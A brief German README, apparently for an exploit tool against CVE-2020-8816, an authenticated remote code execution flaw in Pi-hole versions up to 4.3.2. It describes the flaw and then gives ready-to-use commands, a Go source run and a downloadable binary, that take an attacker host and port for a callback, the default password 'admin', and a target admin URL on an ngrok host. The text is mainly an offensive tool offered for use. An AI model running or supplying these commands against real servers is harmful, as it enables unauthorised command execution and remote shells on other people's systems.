
Pi-hole ( <= 4.3.2) authentifizierte Remote-Codeausführung.
Pi-hole (Versionen <= 4.3.2) ist von einer Remote-Code-Ausführungsschwachstelle betroffen. Ein authentifizierter Benutzer des Webportals kann beliebige Befehle auf dem zugrunde liegenden Server mit den Rechten des lokalen Benutzers ausführen, der den Dienst ausführt.
go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/
oder lade die Binärdatei CVE-2020-8816 herunter :
./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/